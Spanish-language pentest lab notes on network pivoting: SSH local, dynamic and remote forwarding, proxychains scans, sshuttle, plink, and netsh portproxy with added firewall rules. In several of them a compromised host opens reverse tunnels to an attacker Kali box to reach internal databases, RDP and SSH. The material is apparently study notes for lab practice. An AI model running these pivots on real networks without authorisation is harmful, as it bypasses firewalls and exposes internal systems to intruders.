SSH Tunneling
Local Port Forwarding
Máquina WEB
Desde la máquina web realizamos el Port Forwarding con SSH.
ssh -N -L 0.0.0.0:4455:172.16.50.10:445 <user>@10.10.100.20
En este caso, el puerto que queremos redireccionar es el 445 de la máquina Windows SHARES.
Dynamic Port Forwarding
Máquina WEB
ssh -N -D 0.0.0.0:9999 <user>@10.10.100.20
Kali
Agregamos la conexión al proxy en el archivo proxychains4.conf (Kali) en Parrot es proxychains.conf.
vim /etc/proxychains4.conf
socks5 192.168.50.10 9999
proxychains smbclient -p 4455 //172.16.50.10/<SHARE> -U <USERNAME> --password=<PASSWORD>
Remote Port Forwarding
KALI <-> FIREWALL <-> WEB > DATABASE > SHARES
Kali
sudo systemctl start ssh
sudo ss -tulpn
Máquina Web
ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 kali@192.168.50.10
Kali
psql -h 127.0.0.1 -p 2345 -U postgres
Remote Dynamic Port Forwarding
KALI <- FIREWALL <- WEB -> INTERNAL NETWORK
Máquina Web
ssh -N -R 9998 kali@192.168.50.10
Kali
sudo ss -tulpn
vim /etc/proxychains4.conf
socks5 127.0.0.1 9998 # agregar esta linea
# Realizamos escaneos a través de proxychains
proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20
sshuttle
| Sistema | IP |
|---|---|
| KALI | 192.168.50.10 |
| WEB | 192.168.100.10 |
| WINDOWS JUMP SERVER | 192.168.100.20 |
| DATABASE | 10.10.100.20 |
| WINDOWS - SHARES | 172.16.50.10 |
KALI -> WEB -> INTERNAL NETWORK
Máquina Web
socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22
Kali
sshuttle -r <user>@192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24
smbclient -L //172.16.50.10/ -U <user> --password=<password>
ssh.exe
| Sistema | IP |
|---|---|
| KALI | 192.168.50.10 |
| WEB | 192.168.100.10 |
| WINDOWS JUMP SERVER | 192.168.100.20 |
| DATABASE | 10.10.100.20 |
| WINDOWS - SHARES | 172.16.50.10 |
KALI <- FIREWALL <- WINDOWS JUMP SERVER -> INTERNAL NETWORK
Kali
sudo systemctl start ssh
xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:192.168.100.20
Windows Jump Server
where ssh
C:\Windows\System32\OpenSSH\ssh.exe
C:\Windows\System32\OpenSSH> ssh -N -R 9998 <USERNAME>@192.168.50.10
Kali
ss -tulpn
vim /etc/proxychains4.conf
socks5 127.0.0.1 9998 # agregar esta linea
proxychains psql -h 10.10.100.20 -U postgres
Plink
| Sistema | IP |
|---|---|
| KALI | 192.168.50.10 |
| WEB | 192.168.100.10 |
| WINDOWS JUMP SERVER | 192.168.100.20 |
| DATABASE | 10.10.100.20 |
| WINDOWS - SHARES | 172.16.50.10 |
| KALI <- FIREWALL <- WINDOWS JUMP SERVER |
Kali
find / -name plink.exe 2>/dev/null
/usr/share/windows-resources/binaries/plink.exe
Windows Jump Server
plink.exe -ssh -l <USERNAME> -pw <PASSWORD> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.50.10
Kali
ss -tulpn
xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:127.0.0.1:9833
Netsh
| Sistema | IP |
|---|---|
| KALI | 192.168.50.10 |
| WEB | 192.168.100.10 |
| WINDOWS JUMP SERVER | 192.168.100.20 |
| DATABASE | 10.10.100.20 |
| WINDOWS - SHARES | 172.16.50.10 |
KALI <- FIREWALL <- WINDOWS JUMP SERVER -> DATABASE
Kali
xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:192.168.100.20
Windows Jump Server
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.10 connectport=22 connectaddress=10.10.100.20
netstat -anp TCP | findstr "2222"
netsh interface portproxy show all
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.10 localport=2222 action=allow
Kali
sudo nmap -sS 192.168.50.10 -Pn -n -p2222
ssh database_admin@192.168.50.10 -p2222
Windows Jump Server
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.10